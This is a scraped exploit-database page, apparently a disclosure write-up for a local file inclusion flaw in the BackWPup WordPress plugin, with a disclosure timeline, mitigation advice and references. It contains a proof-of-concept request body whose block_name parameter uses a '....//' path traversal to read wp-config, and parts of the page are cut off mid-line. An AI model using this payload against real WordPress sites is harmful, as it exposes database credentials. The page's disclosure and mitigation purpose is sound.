Share 
## https://sploitus.com/exploit?id=C53E65E6-9E7C-53AA-A7C1-4E627243A4DE
# CVE-2026-6227: Local File Inclusion in BackWPup

![CVSS](https://img.shields.io/badge/CVSS-7.2%20High-red)
![Version](https://img.shields.io/badge/BackWPup-
Cookie: wordpress_logged_in_=

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
```

5. Observe the response to verify file inclusion behavior.

## Timeline
- 2026-03: Vulnerability reported to vendor
- 2026-03-25: Vendor patch released in 5.6.7
- 2026-04-13: Public disclosure (CVE-2026-6227)

## Mitigation
- Update BackWPup to version 5.6.7 or later
- Restrict assignment of `backwpup` capability to trusted roles only
- Review audit logs for suspicious access to `/wp-json/backwpup/v1/getblock`

## References
- Vendor plugin page: https://wordpress.org/plugins/backwpup/
- CVE reference (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter